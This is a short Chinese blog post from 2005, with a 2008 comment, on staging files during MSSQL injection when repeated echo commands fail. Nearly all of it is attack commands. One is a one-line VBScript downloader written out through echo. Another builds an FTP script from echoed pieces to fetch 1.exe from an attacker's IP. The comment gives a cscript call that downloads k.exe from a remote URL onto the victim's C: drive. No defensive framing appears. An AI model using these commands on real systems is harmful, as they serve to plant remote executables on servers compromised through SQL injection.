KYO的地盘

mssql注射中有参数被调用多次调用,导致注射时不可以多次echo [ 2005-05-25 1:02:37 PM | Author: kyo327 | From: Original ]

解决办法:
1.iget.vbs一次写入
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写

Set x= createObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2

这样我们可以一次echo成功,echo版本:

echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs

2.调用ftp脚本的写法

echo open ip>1.vbs
echo u>2.vbs
echo s>3.vbs
echo binary>4.vbs
echo get 1.exe>5.vbs
echo bye>6.vbs

copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs ftp.txt
ftp -s:ftp.txt

[ Edited by kyo327 at 2005-05-25 1:34:52 PM ]

Comments RSS Feed

http://www.kyospace.com/feedcomm.asp?logID=109

kyo327 Posted at 2008-12-23 11:44:08 AM

echo Set XP= createObject(^"MSXML2.ServerXMLHTTP.3.0^"):XP.Open ^"GET^",LCase(WScript.Arguments(0)),0:XP.Send():Set SG = createObject(^"ADODB.Stream^"):SG.Mode = 3:SG.Type = 1:SG.Open():SG.Write(XP.responseBody):SG.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

cscript c:\iget.vbs htp://www.baidu.com/k.exe c:\k.exe

Post Comment
Topic Locked or You don't have the Permission. No Comment Allowed.